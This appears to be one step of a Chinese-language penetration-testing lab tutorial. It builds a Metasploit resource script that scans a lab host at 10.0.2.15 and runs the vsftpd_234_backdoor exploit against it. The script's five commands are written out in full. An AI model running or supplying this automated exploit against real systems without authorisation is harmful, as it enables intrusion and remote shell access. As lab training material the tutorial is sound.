包含使用 exploit、设置选项和运行的命令
在本步骤中,你将向脚本添加核心攻击命令。我们将针对 VSFTPD 服务器中一个已知的漏洞,特别是 vsftpd_234_backdoor exploit。你将添加命令来选择此 exploit,设置所需的 target 选项,最后执行它。
再次使用 nano 打开 attack.rc 文件:
nano attack.rc
将以下命令追加到文件末尾。这些命令指示 Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor: 选择特定的 exploit 模块。
set RHOSTS 10.0.2.15: 将 RHOSTS (Remote Hosts) 选项设置为我们目标的 IP 地址。
exploit: 发起攻击。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
添加这些行后,你完整的 attack.rc 文件现在应包含以下五个命令:
workspace -a vsftpd_lab
db_nmap -A 10.0.2.15
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.15
exploit
保存更改并退出 nano 编辑器(Ctrl+X,Y,Enter)。你的自动化攻击脚本现已完成。